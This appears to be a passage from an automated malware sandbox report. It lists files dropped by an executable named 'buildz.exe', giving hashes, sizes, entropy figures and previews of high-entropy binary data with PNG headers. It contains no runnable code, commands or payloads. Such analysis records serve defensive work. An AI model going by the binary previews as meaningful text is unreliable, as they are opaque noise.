                        SSDEEP:48:V1upwKoD6BAYIy3jw3z/R8di1DkR06QtFtBg+vo1UD:V1AsGjwjp8dmouB+A
                        MD5:E769A028C02BDD9E49789067DD83114A
                        SHA1:CEE27177B5B18D725FA628AD3A3BEEDEA2C52FC6
                        SHA-256:57DF92F3D4F3ED07C52571421D183EC81BDD7AE25601C544E1331DFC51C6018C
                        SHA-512:04AB609CE89F4DDD2F8858D514FDF8175167663905D76A6514874A75AFEAF3C28725F45A7059426BFE5661102963FE0E769702529208837A6F413BEFD2963DEE
                        Malicious:false
                        Preview:.PNG.......7...C.....h.....U.......u.i.OLF]....h....O....5...b..J.-b..O...{.8h..vE..|..8W&..p..%..w.fu3....ugH..M.M.{..rfF)4R...<....4..Rvl~....0..6,ac...F@hD,.pO...E.......dk6'M....l!%..->A6?6.%.'...E.)......c.....tI.]$..6.K........`.......C..<f.w.L..`v[........."....)6^.~,...;.......F.?a.|2y'.v..I^." ...^.X:..P}.e...."...m..N...-.........Q.(.).z.W.....$v>..8..mQ.N.....|c..4.FTkD...sX=.)jJ1...To..B...s."h...K..3.lL..9.w.b........hG .PmX..3.f...N{.2_QqPB.@..(.s...jf5b>.N.R...Lhm.8[=8,...........R=4.o..?%..P....u.......R.)W...W.......Y.q.f..c..........0........N...ug.bL..eo.....z.7..Y..d..1..1...(...F....?....xq..+wT.G|'....[s.p.. N).m.q.E.....p}...V...y...<.9a.X5`![F.|....x.:....jf..=H^$.Dr...x.d..Z....p....wwi...I.....!...!.^.^e.m.......P.{.\=..a..5...V.M9...N..HY....7.Dmav..5..^..a.L....6.`.FV..k..^..m.Q..."...:.Z$R......}$>".=&J/t.P......Pz.....L.;I..o......[.6........?.B.~......e..-...5.V!.......L..aG6.Q....q...+.w.a.q.j.l+Mf\.j.13
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1629
                        Entropy (8bit):7.879506322050421
                        Encrypted:false
                        SSDEEP:48:Vvya0LzsKtKbegUSayvqkWaZsLAtOeoFsS1ekj/3kUD:J8PsRbZ4yvmLpeoFWkgA
                        MD5:8B7FC985BF97EDE7BAB0387724271E3E
                        SHA1:1B743F7E9689FB918C3F1CBFFC9A6CB3DC4549B9
                        SHA-256:C5F370A35C748B2491DEF653FB7E322B1BE3B5CBFB8C51A4AFD6F72EC49A3D29
                        SHA-512:675D3F3FCBFEBC0D19D5BF2614BB10DCC2F97BE7736FDC6E968E3D7E6DE7FC03FCE35D2F11CD02B49AAE11555D65035D20898A40304E62E8A4A761EF3FC3F8D2
                        Malicious:false
                        Preview:.PNG.{.F.\...h..]2..-..k..q.L.y.YN.e|..~..4p.>....29.M)o........#MMFE.MP8`..n.o..8.....7......0j.K.m..}.H\!..'mu....<....I7...'.i.3H.N......Eb..7...q...../i.VB.6...[*(e...]0O].^p7Z....%>.<hHen.pVp.l.0cY@l9U!.O.../.Tv..sHD..X..w......Y.....^x..<[.j...+.3..C...n....IXD....tKbF.L.......).a........w..}..y...;...Y.....XO.......b..`.....c`...3}).....S..d......C..UM......F. Ml5.+u4N......../..gug..Fimk.._=.qa.|q.....|....;f....UO..:(qd.ea.......(.I..:.X8g*.|......./.EX.,..|.k..H..g...8j..Fm.l.5.,...M./.b.....$'..M..3G..j..N.!...5a.k.....&..ES.."..s..N.........rC.l(L.7c[5...X.i......eo.=...H...qV'w:..C...'.KYY.mR..w`.bF.N.....Uu......}..Xn.x.<S.q..*......t..v........q1...(.7U%.....%.>[Ml...~.....-...3c...w@...M..k.....j.K....FP^.\n5V..'...s..._.F...S..L..].y...*B....)....s..!kh|T..%. @......mm..s...v_..%.2B..2n.q..*.....3T$.G..9....E..[o..G....z..6..^q....!..<........rQT.s.z...y......[z....{.A..)..OClm:...R..+..;.......V.92
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5525
                        Entropy (8bit):7.967774000879204
                        Encrypted:false
                        SSDEEP:96:M6U8e1r9kq+GrTtipRKenhbkYa/sCaiVuPXw2fFWazdpoWIp7A:XtkeamRK41kYa/sCabPXw2fFWpWiA
                        MD5:B52BB1DD79F80F151D3CE2D3F681C33D
                        SHA1:187929DF39553D783EB321464FCB9F417F3D59A9
                        SHA-256:6DDA5E3A0C828DBA01329E1AEB993FBAAC480BC4D0BDACBB184EB1D54A55D4BF
                        SHA-512:A1D6807E15635191A5414685541CCCEC444665CE4E53F7291293FC8DC9618518DB65A38234DF54EDC1D2DC1375542CB23867263D8D660C98B4B6670C44B545E8
                        Malicious:false
                        Preview:.PNG.x..g...k\-....0A....b.w...ysKf,!.k....AKc.8.p4.*....C......(J....;3...n......>T..o%.(.....r5....9..u..=f.....S.T..E.?Yq.+..YF;.^..h-.(H..{....#Q.:..1...../......."..`$F.JV.R....5':.~..6.Td..l.Y..$P.u.......:...Ut...r..;P.{..q..\..F....Q).y.RmC...;.4a.......a?......h.$.7...u".I...k..y_A&.KR....!...._5.......N.Z..1/.K........s..a V.......M..n....F.|..T.z;..Dr).N.3.7M.[#..G.......@.*u.0.8zw.i....L!q...D..\x7.hp.Y...3..F......... ...i....A|y.%./.o<.8..G.%R.....I.V..*9..P....@.`w.4i....$..6.Jc.T.F..................{8Z...^..;......u.>.V..M?.X...m.r?8.BX.C/>G.v.CF.}...#....F..;.O.......M'y..!.D.>d..n.?OO.H.....f.`.8....B...?...*=gP.3.2..........&2.....Mk9.\#r.N..~.ri.....!..$..v..u..j.......d..4....-._...W.c..R.k5{....>a....0U..nj*...............2n.5nC`.{.....Q3.z...'Q.l5...f....Km3...Dh..#......w......cj...Xywo..u.`#... .o....4......q.v.X..L.#...m.@.T..V7.Y...?..P..zI5.C:I...TS..z..1Q..h.....c..5...R........3e.Ew...r*s..MK...m^...'O..C.....5..2I
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1359
                        Entropy (8bit):7.842004054214645
                        Encrypted:false
                        SSDEEP:24:IEykPZIZ0ZiJnXe8d64pmtP+Re0qI855FhwuGMty0hX0cLn7awuo48oGbD:IEDPSZ0q1dJpaPN28555GMec77awunUD
                        MD5:D8EF2509DB557BDB946127E6DADD5E5D
                        SHA1:F324A7D3BF2BC53604B7069E20E1E0AF615F955B
                        SHA-256:FE975277FA8C1E720310CB3996D1C845FFFAA603B76455E1A5DC5C024B57AF7C
                        SHA-512:0B5509155BC4A90DE45CBFAEE8D3E5884436C8E2D9D1302E5054C5EA8E6D3CF67A6F6F59ABAD15C57A45D50F5B89F2CAF8D3F98BCFA9E716C38C3B21C02D1E38
                        Malicious:false
                        Preview:.PNG....&..\.K.H....v@..K.X.G.T}.....n..im.o..+.|...X.\%.E.X.....Uz..V.*.D.0.!.'..].J./....=R.?.Vj...\......../S.k..&.H....l.!..:o%...D....'..>..;<..D.......$/Cus.....c..y......n...0...;,......5....A.~.Y.*R.!.q.!).h.z/L...~....._qte.2C.....n......S.].7.-.;e... ._.......(}.6_.+...^:.........Wx..8...0..K.o*.6.w".z..T..V.P...^R.:0h..-7k.....l[B.k}.....NL.F#{....EF....>g\4..^..{.).]*53$.uWK..I...H.J.@...).kA.i.....Kc..!.S...L<Q.Y.......c...xj...LXO....SP..K.'T@`...F..Ej.a.b...Z.......T.,...(.....af...@..Uyy..G.3}P.-.....A.b6X...4.S..G.G.7.K..5.."^...8....r....%.............B.by.b...J.s.q..s.?..E<..B..3.. *W.R.s.....j../..I.J..c{...".......A..!..0u...f...../.<u.....[M[..M.3l.3.....9..#.;vA..H..}..<.^..Z........0:c.f.U.8.AI.a...NL.k.o3J7....K.rL.....(`_..vqWT.$c.._U.:l.*W..]..a!V.o...6....{...L.....r{.0m...G{i.......;.)@..82.x./t*.3h.+....5...]Y.8.....UW+L.`.f.`...d.....}..B..*{d~...=..!..}...b..D..B....[!.k......%,OW^.G~f^b.....l+.V..@7.."......X
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1703
                        Entropy (8bit):7.895402076906046
                        Encrypted:false
                        SSDEEP:48:NGYK7+VX/5IX8ncmfnIj9uT55VmBQ4R2Oerkf0suX4uUD:NGYW+xncyg9ubU7kkc9A
                        MD5:0EF12CE468753683C540CDCB37AEFA56
                        SHA1:675549DCCD1C9E5DAC1ACDDF8D8DD31D58F46375
                        SHA-256:19DDF3EB528423CCEA141B6BBFEBED036BDBC474D4BCE23518685B6354E9A3A7
                        SHA-512:5209EEE51D94E944CBB185B229F4925BD9882EF5DAC9782B48C2AD5FB37A052BA2DE5AE1E9EBCDB928E5DFBA63D7C56DB7392B824FCB47156F1919C52A1E61F6
                        Malicious:false
                        Preview:.PNG.r.2...I..O....SrJV..6.=]w..v.<..i.v.Y.\.....,yO.27H....r@....p@.h.ATs.H..|.....z.+>....d...#...*......7...#.4..4~.lW...... H...........sYd\X.......h'rhH&._..t1\D.A....7&qn.%.c.+...>..GH8..S..FZ.bA.!~$.6.w.b..W........L.].#.G.5y...........C.W7.v'....R1!...'&..U.0.A.I.0.{.Z.....`....w.w.z.Fv....._.J..M....Q.u..v....&.!.^....V6..n..].T.C.......\.j..[...]......_.[*..&.z...../.X..a..8.J]..+.."..R....bZ...`W.[]....zc.rA3j.j.[.?...%V.?6Z.]O......ok~...N23..0.W..>..1....n.^.a.}f.W.............x...%..QO..k.(...#4....>../XT.X.v.......SL(.).m..TF{.k...ll=...;S{%..5.e..."./..S.......zm...:.q..=G&N^C.w..z..|.]9n.S.d3.4N62.0.....d.^..B....=..|...!......'.......WS..n...r..a$..k../.t......J.ji...5..j,.m..u.....V..:y...=...).B..)...?[...w{......)..,.xU{u<\R].<..<.]....g...b|Q.P.).W?..}}.3G.k..0-.d.,/.... ...`.|......}.*..=.33.f/..)..Y.4..m....=.K.>H.Z..m.A.....BrK/=..x...W.....X.a.....v.1.!...g.....%...z.....=@..Q.-#...b...M?.M..aA.X.;..O...\..P8..n.L&
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1848
                        Entropy (8bit):7.870457688784998
                        Encrypted:false
                        SSDEEP:48:IFxeaMukSZay158iMvH8ndqGyt3/D7+5YhMBvlqUD:cnMAXv+H8ndDoCWKlqA
                        MD5:4205B25E9197C179D59DA2D6DD8E3C20
                        SHA1:2BADC8DF48A55CA6D1759C97CC9808FCC935614F
                        SHA-256:65507C1E6881EDBACD78BB2370749D386CE47CE1850D00A261FADB7D3378AAF5
                        SHA-512:4E302AF844AE636617FC70AF843D58086A74958F3B3C3C575866A3C8941C9C1216CF53A8935B5248923F9332E78E387E6C9D53CD41D53CAEB715495C748B7388
                        Malicious:false
                        Preview:.PNG.d.e.....=...Z.6..4..F..Wl..$....3.%..f....v(wIF..z.x...U~.=..].8@..3n..m}x......A\k.UcHovG-..w..7...lD.F...-.....|....GV~7....wuV..}.......5..r..W.C..../31.....w..E#X..}+Pt^...........o.n..ho..w.\.nO-..m.n..4^.z..J......L@..../.M.....F....Cg...Z...E.GY@...<..fNO...Wt.5..=.t...f...z.....4...}.~. ..i.o..8!^..a.m.Qo.O..`.m.>..)..z.....,..z.7\...-..,..|.!....S........Sj.....IE$A.fZ,.7=.....IJ.6.......-ag...'r.7........3`L...J.]..Vy.^.CeO.?...n....]..b...T.2.C.EY5.......B...I.."..$...I..b#.o.....:.......uM.L..Q(..2.A..rUh......q.d>..../..3.jD..=0..la4..>v.............L.,.......6..../..K,6lP.....\.'"F.f.]..$.)..$mT5....U.D...C$v......_p..U.[.d.{.... Q..^....Wu.d..{4d.G...\......``..0.s..2.$yY3...8P.}.D.5cm#.?n .G.r9..R..B..M......PL.0k..}...,.....R.2U...v..(....Cbwuy....A.Bbx.z...JSe.i..yPP..M......-{..N.cR..(.FT.F..^4m.Y.r.].o...Q...4...."....f._.J.Z....q1...q}..L.7......a....l..,.Uv.@.L+..[.[......b..z...T%.....L..eUb.5.V..G
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2181
                        Entropy (8bit):7.920326524580705
                        Encrypted:false
                        SSDEEP:48:mZI/JmsP0xlMJWu2lgOJKsXvqvLSksyh3Tbb5DJktdr4H126vBeUD:mZI/h0Xu21qFH3jQtdEHQNA
                        MD5:9AC2073CB9540A64F2A9314FF3D0E0D4
                        SHA1:F4235FFC414B6F28147C68F28144E5EA8AB468B7
                        SHA-256:D433AAFD3B5DF3E1ADF7D2D2BCCC655FA3CD4827EB2ADB36EEE42CD3CD86357F
                        SHA-512:5D4CCD86B25D4739A3CC998BA6152F114125A025CFB90B2BEE89D6FAA172806E7FC69E7D01A1447FC44947FAD6FB54136BB36D4E78058A8753C4CC9596E83B83
                        Malicious:false
                        Preview:.PNG.....I.3.x4Y;h..~...Mc.........&.-..Df3.W.4Y.Q..,.........u.a..a...!f).f..._......f...|..;.GyFH.8{...L....~G....z.]..@..lJW..Eth...d.(A@..*.m.WM.)A.D....Wi.P...7rJ.0^..$W.&..'....Z=....H....y.....b,............m9...`9....!.^.."....}....-.8o...d..Jm9.Z%J..m.\.Z........qV.!q.k....n.~...=....E...=V...|..".J..z..R...g.."..a..6..i..+D..-G..$...A...|&.$R..*$X."...w.j.x..<r...k.....4.'.._...)W.O....'.......%X.Q..El39P..p..?....#...q..I<{.F..c.|..0T....9.b.I.#..t.&.rX.%..b|-@l^.O..xX...,.~.D !.1..G.+.[IN..V..."./.u.tw.53.,.VA.iR..w .}..zO..k.|;T..v.Hx..[0.H.~.......7..}..Ur....iv.50.*!..T..C..m..7~~]n..i.*...A.=..z.2...3....s.l.j G...$..q>g8A{.+..Ncn(.$.g..H\.p..m..~..,......2......t.*'.-#4..\..E..%A.%t..qn./...`.R.h..|..D*..I[gt....G2.]!.?V.j..rz.S.Zf..).j..s.8..d..u..:..J7S.l~7k.......ih.&.@.W'=..!.g.........5.(....Pl...Z.E.y.y^.=....W....9'T...dg...."..G=o...[.|T.)I...H.N/V@oP..I..c...K.X..A:.Y\.(..m.A..H@b,A./.V.[...........Q.].D..+..).t..[...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5710
                        Entropy (8bit):7.966760335615346
                        Encrypted:false
                        SSDEEP:96:D1T2f1Tu9P9RiIablIq4iBgzTfEoUZ9YDUsEch9tWtNA64mG+SRi/Hw8pDh4+C3j:DZos9P9MImlXKzTfqUDU+h9wNfGr+Qqg
                        MD5:0B1AB53EB0D2C72DA1A8A686BB4B03FB
                        SHA1:80F2D7577D22A03EEA26C1BC9401EE134EF7FDE4
                        SHA-256:FCFFCD0E35E87241C696E7FD05F48C194DD40273F4D9F9FE4A8D2DD56AFF2827
                        SHA-512:71132A4D5D6BFE3689008F371EC9CC7E82647771D22C83441798AE50535FDBB7AD38B905FA237BA0A1D4EC7F597D5E04924F6FF2C522253CFE032583735983BC
                        Malicious:false
                        Preview:.PNG..~.s..>..9x1.g..........GE...h.z..".j.y.....^....*.].;j.pi.2..M..y9.+...l.P.[....K._.u.R!....<...r.iFb..d...N........w.....u..T.fr.....O_.........-..a........5,...A:=.....!.:.4.ym...."..xG^.......M.6.........=....&.......I.....m...N....'!..R*d......XK.T..>BJ.t@S..... ..~m#.C...a.-".CZZ.-+..d-......$.~..7..;.D5._w....K^W...1...4.,..c(..~r....|.:.KR....]*[R..c.g..o].......fy.>......l..&U.hZ.Q.;,w.W.+...F._..L.m.a.A...}{.........{?]Iw~7.pw.U..d.F...$..]...E.Lc&l...'WB.Pae...I;.....i.....O.SN.....z.e.z.}..R1.I.f.1Sg.77.....k.......,b,.`j.2....?.St....(;..*.n..gB2I...{9.t.a...n..~.|..-....Z9......d......US.(.L.W_g..e^....*8.F.<w.?P72msS.Q".s$......S.u..,).-Q.r.D{.B6&./5...,S..i...........4..Dw.i...t....-r...2..n....9..^EH.....v+YU.....<.[.....H....\........Py.p..Q.z=.G...B/.\!. E.u..k...m2..t.{n....e.%..j..Ltc._.u...7.g.Fk(..9..})w....V.U.:.AO...!.F.yC..:XO...Z.].P.e.....8...../.z....v.W~..N>....."..M...ww..q1..q..S.f.kq.gn}..Y.`...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3253
                        Entropy (8bit):7.929573575663722
                        Encrypted:false
                        SSDEEP:96:8Mg8fJ938IbAoKA5gJO0yxrkvTyvzd3s0Blgp/kODSSVGJkbVIeA:8/Vy0nmILyvze0Bap/kO94+VIeA
                        MD5:A4BB177A48AF8B3AA69211A47306BDC3
                        SHA1:A860ED6548DA6D06A5E5DB43C289E3D6457D1E9B
                        SHA-256:08C190FB587E4EA8D414D2BE8FC469AD5E3BE399960D4421AF203D9A37E5B846
                        SHA-512:A1E4A585CBA83430B50999AFBBD8FCA3118A318917D80269C39F22BC873BA5F8ED3C478963465FED1A73401A14742C51F0E73E4AE1358E78CFCFC60293244E12
                        Malicious:false
                        Preview:.PNG.n....(!jt6..... ......J..-.6..5.zcX.N;........-.Na.....Y=.....2.~.".=g}dM....1/O.6.g.wi.D|.F..........\..U...|......A..!S....2.U...2.1.a.|.....w...)y..uJ....*......7..h.0.E_RI...."OS&....../Hg..Q.n........=5X.DEfg.Zh.A.n..9...J.4..Fj.iS..$....hrvO.'h.+..&....Gi........x|..N..a.-QNr6...PT...2K...0.....'...b.......c.M.>...{h...o.mHU......M....}..........c...`..[...~...........pl..-......,>..._:j.qN ,......c+5..L..~=(..v.2.@..MUb...^.B..]...7;d|5.I.]..G2..p...n...O ...Z..`h..p..!.w....?.....F...d...V.t...*i0...3....zO=.A.S..C.N....E...1...."YN..WG...."B.u......D....Q.y....~.n..c..&.r.g.O...O.....x.,!..j.O._W......oP 1z.........l..C.^].!~.0.......#....-^......Ce............x...\....)wJ...........-Q.k..7..B= :.l.f...|.x......H... .^...mFavG...E.M.c.........ZS.7.....G..4u*v.g..+z..(-?.(9.].....R7k...w.yE..P..`..G.......z..)1b.~.=-........jV..h..b..............Z$L....D..Ru.d...!v...<...#..sCM..[<.W......Xk..e6..V....P....1]X?.7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12565
                        Entropy (8bit):7.984507564510996
                        Encrypted:false
                        SSDEEP:384:xzvivVbAaNekt8MqtZDFccHUE3o+HI79+ipA:xudN58ZDq6UEo+opzpA
                        MD5:D680ECF516EA167EA9D630A61599365E
                        SHA1:123B2E943A385E3D0C9E14FB2E5E2B60A3C28018
                        SHA-256:7CEFCD255AE2C5561F24342223E11C7F6613AE340CF469A7583E601D8C6CD924
                        SHA-512:60A3E80320C8E926B96E002CF519187E28C2A552FE23BAC3852F0472F6D4E3494F6D05D9320BC171EAE043D5AAA4E282C8EAB023BE5F668F347437E39F77F17E
                        Malicious:false
                        Preview:.PNG.....d.9;.'|....f..h....=x...9<.f...<.ul.c:5...SMr.....@...g.s....k*..EI-..Jn.b+.......y..shC.~oB1=h.M.N2..xd..Bp....L...<....v5.t......c2D.i...z.....*&...../..~.z..B.p@.`.....Qx....T ....*../.Y..y...wb.Z]y.].."..`.Q..hw.........+...>7....4../3.l.....{......H.y....:1...........n...=../#tR.Ov....!.A.....`...{...NJ.*.8...)....)......i..\#...A...Op.....)P.!..7....Q5.9.7g.>.g...rT.....P.F..I...^7....G.C....u..N.....|.&.l...H-.yZ..yf..m.5c..D........h..*...:i.\...j.`...x...!L.Q~.......m7..m...=.....2...W..-'5......$..Yv.,^.....5~...p).1"..s..Y^.u....7.t..... .Q.=CI..>.G+...........").....e...RA........s.0D.o..pVlu`....L.......`....9A.....H.~.....Y...x.$...zf..|%.... .>..t`...].6h.c...#......tk>.....93|It......ji..V2.....T.&..M....].)5\.L.l#8....|.Z...o..0.N..D...Rh.]3a..<..Qh.2.X*z.x...{.......t....9r%.9K.5....V..A.Gp!...J"w}Q.....E..[z.~...}CW......Qd!..V...;......r.&..M~A#E<..._c:..L...b7.....M...On...yOu. ......c..9.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1892
                        Entropy (8bit):7.906971597124221
                        Encrypted:false
                        SSDEEP:24:DG/LCsesGo8ORgp6elEpYUoWXcpR8h0VsH1DSiUbqDcWk2IL8mTjGbD:Eu1e1RsEYuXoySeBSfbqDJmL8mTjUD
                        MD5:1A8EFC7837592EC13427AE4650F304A2
                        SHA1:5C077E16795403ABEAC8C1306141723F0A4842F1
                        SHA-256:0CC3677877AE9D313558EA854176ECDBE2C0B05D80B4AB9E9874A920F53EFB0D
                        SHA-512:A06AB34E25E4F2193ACC4DF71BF2433BF097C248F010933929D0288778EE5E166DE399864BB994E9A223C9A43FF9AA5F738923E52859060F442514DFED2DCF07
                        Malicious:false
                        Preview:.PNG.A}.J|.m.o..k./>J. G.n..=>......i'.+......m.G1.3.%..oO ..[)H.?[..bH.p4...nLT.IF.......d..........u.X|.z..^...wEn..t...N..pl.)&....X#.Is.............9h>...2..........t|$l.oH...-I..^...)...H[4J..O.2......T.....j..1,.XR.[E....$..b...-......T..~....Q..aQ..S..A........V..S.i..z...../.IB.2....-`..>..f{.V.2S.^..q~Fw......I..m..:..N....9..Wc..M/.Y.....E.0c.&..d..../G<s.[.........?.....33...y4+kNa....l....x.:..]Sa.<....{......LDX.".C........~q..!-.0.....Z[.b.e..Rr.lW}N.S..,..I1K..:...`/....ORt.)..m...g....=u..4.h."........}.....r.'[.H......|....DJc._...3...h...:..ZP.....|}.fc&.4....<.yY......w-."....kl...q..?.fh.K2.]$f..=..8.....~Q..;.A..?o.k.X9.f.5r.8...=i.).R..#NI.@.L.".>.....*%:...)F.......f..q...-7.L..Bo9.vZ....].Q%....7N...V.(!E..0...AY,...{Z..............".K.I.....3.U.x.Ul.K..g..#r.c.&&.>R.2.]Q.4..)~Z.........2%......$..C.#...)..{.|..%....!A..7d....>.<vdO...j/l.9.^:`Y)..0.Cl'..o...[.C.......u...b.c..(.F.Te2..'.-....r....H.k.yP.....c._.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2715
                        Entropy (8bit):7.9269683834967655
                        Encrypted:false
                        SSDEEP:48:/J3i3LwaaXZ9SKgsZaKdVI4gHfg1Xyrzc0X3zkzbXHc7UD:/J3i3LpaXZBBZa+I4gHf0irfGXHOA
                        MD5:6FDBAFB93DE2DF89269FD8F5481182E0
                        SHA1:CBEE45C78C1EA74E71F8D19B49EDE234231F58AD
                        SHA-256:E6A539869B32F0270466B5991FD9FBABEC3457615983E77E2AEA38DEAA4D6988
                        SHA-512:692E4181336B9DFF4CC31F22E320A226277E2597B2B5EFF79DDE3DF80D0CD8E92E22DCCD72C2091E79EB056347942C810E0BC3A4741A2F4219487641DA904E41
                        Malicious:false
                        Preview:.PNG.!.f.)...%.M"..Ff.."u..o......;.....?Zgc.N8s.c...v..k.5.},....!..l..c.;...u], =.Z....Z.pA...6........k......u.0.......W..."...Si~.s....T.X.xW..n..v...'4D8.Rf..0Tl.....X.9VuB.)s..+....A.....0:....va.7..._.q....e.......;4.x..q.A"z.N..L..&....._f..../....!#c/@".........R6.,...d.8.h.50...N</@.kN.....:<J...+..~.C011.P<.(.........c(f...x...71...C.TJ..#..!9...\s.y..f.44(.]..S67...m....t..^8....n..m.........".V...M...T7D.M..J..Hq.7..md............'.>.....Od....9b.!>.4[.p.\.(.....(...?...q?.(.5..X$FS1..Do.....@...y..9..tY....`..q..>...{......N'3.......f......W.hE~u.Y.*..p~...u.....Xb.j.....3o.I....7p...........^....W.!%7.v. .yA...5T.n..j...7.*....mg=.n...........m...-..)e....|A.`x.P.t.Y.s]k....8...f..=o4.Z#z..,.......,;..e..>y4e...i..Nx.....G..<...Wt......bUv.^.+.Hk.=.M.a...W].g}5G.=e......|..0O..........rZG\S..%h*b.[.....0..G.&wP.(;.L...)g-/.......s...8...`...'.pO..>...l..'.....*;...;...d@..y[.4lM...4.P..8.Y.~.|.7..,?........!..*B[..a.ouJ`W...D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3330
                        Entropy (8bit):7.9434892664857735
                        Encrypted:false
                        SSDEEP:96:dXy9GfAmzPwDYxhH03yeXLZv/s5Wk9LT8yyTSi0X9RZBNxA:dXy9YwcUCeXLh05j9LvESZzxA
                        MD5:6884CB2E14873FAE55DDE0301F1E0344
                        SHA1:DDF86770BD6A1A6588A92902E667971D21C6403E
                        SHA-256:13DD5B03BE98C7C2E41E73754624D957A7DFDB5DAD71CF724E4486AEE5EED3D4
                        SHA-512:D0E09712F49089E6F989C8C1F825F86B879B5C00427AEEB0738D9F1ED8A6D20176F94303D02DE6403B726518A6B82F65D3D8EF48CF74D56E59E491F85B9FFBCB
                        Malicious:false
                        Preview:.PNG.]...4.N.rK.f,.hk.,..>.Ga..,.5v'.F(h$..v..?.+.W..S....^+....=uO..k..q..........]eVAXi.7:Hfy.O;..@a.D.....h..,.I...Q.3..I....A3.4Ay...Y...H..hqR..}.^.=......I3..............)z]C9.gH..D..}..y%!.yG...u......d.tW.F9..w3e..q_.6.x.'].....=-D.f{..Z...R..6..21Ut..K..0......x.4W.aiV`t...C.N..V.?k2f.....W./.f..C..=.)n(.i.?.:.....6.~....O.O....(6.J....'.......@.h...~_..'...6....E..j....l...a ...l..g..G...|..;.KpG........`..1G.0.af..?.{...8h......G..+.w..k..|$9f.{..}.=....E..%s..k.}Hp(.i.n6.<.....A...v~."..t.R....E.4.4......S...A=...:|..12..e.j....}.6..a.2=P.YR......,jASR.W.A........<....;.*('.e.p.....#UI#.OG5?|2,..3.D...brXI.do..}...s..=.`..q...p. .!.a..r.......Q8 ]...I.......D.....c(.En'y..b.s....b.@(.....K...q.`..w.}.v!.V..+6......K0.Z=..Ln..Q.}H........X.....u....#q..k.@...S.~.e%h,....9..C.g.iG.>N...fg..C..C.ZP....cFI.PZs....I......T+.bT...Y....H(.U.)..E.+.&stKpzw;`F...h..@B..`(..1..&+TU.vvj.X6.......d.W.b.....=HADq.v.B.VWYO.x..[...kK..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4188
                        Entropy (8bit):7.952453993612472
                        Encrypted:false
                        SSDEEP:96:/KB+j4hOwylBSDrwvhLI12F/OwONICPtvkmxT0NA:/IZhOwylBkwJ81mONICPJB4A
                        MD5:5F926FC94C8454C09610CF6818ECF0F3
                        SHA1:E02947AD4E1FF35F07BF2BB1EB47559B662CF817
                        SHA-256:66B4ABEE27D457DA7361D5EC11E661FDF63032FA70B1D741340BF8199F774F28
                        SHA-512:B0AC693C8591CFD626CE5CFF96B2CBE94A77EEF9FA16C4252B9A35D3429BFD3FC4062FBA97BF9D7E64B26FE25C8E8EEA7C550C35FA49EEE1623E3844041E5B7C
                        Malicious:false
                        Preview:.PNG.q......Y4!.A..w..wC4.].....`NR...u~.p.R..N.....m~.8...s.. .*/..E.!.......=....R.....r&Lt.=.'..2......g.~..r..+nz._....@~.......u.<.X..Wj..m.9.9..@<I.q.B#\.a..r..MB....;~.....VGyl.8....U......u..u.....I........:?........j5S.|..~uC@..k..).G.....Az.....*....A.Q..k..Y;.w..;..1xM.n.7<.W..2.9$h.q...8.<.... .....(.......2.(q..]...!r.#cneA....r:0b8.......C.F.......o.....a.....J".k.,....`.Bm..,3.......{.t..0......Z.<..>.4.....F,l.......f.W}....Q..H...mb_.N..H.J.h......1...".u..;..v...b...L..I)..X.^C.'..~..f.....B.oh..T?....9.ZF4..W......F........fB.,.NUbo..4.;.O`@..P.k3c.(.^......`:\M.%`{....TY....[..Y..R....N....:f.Un..t..............I...*w...;{..rL.. ,s<r.G..X.<.G.Mp.i..;$!.y...M.x?.c-nYS.E..7..b-...9.p........t.f..Z_.{.1.@...1...7..c.G...c.V..,..;......8......../g.V...Y.S@.<.N.{&b..RH.V..$.OP8..2..SG.#..-....{.:.3....n.A...g8.>..i....jk5i.57....n,@(.;S..\z....3>+..t.....=.D....?.Q..Z....F...6..Q.~../...thq.U..VI..z....y.]...M...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2267
                        Entropy (8bit):7.901386756592671
                        Encrypted:false
                        SSDEEP:48:lXwCz5+yMVnpuKY8lmVzAOFzakhC2APizjadiF35l9WUD:lXwCzdMPuiozaH2APibF1WA
                        MD5:C0C7514E1BB71D9FDDB621168F99D58A
                        SHA1:74E6251EA8DFCECD31D803F163A6C3B17CF6BEFC
                        SHA-256:B2314BF893459C233DA55F157CDC21150E1D29CBA4C5162F6059EF95EF382A19
                        SHA-512:4A51AD0379C942B66FD206F967DD6C0E2628AE3D62497C7A7430A576044EF36BEC55D6C888548AE1152B90349DE8F1430E2938089B8DB34E2C0623719990854B
                        Malicious:false
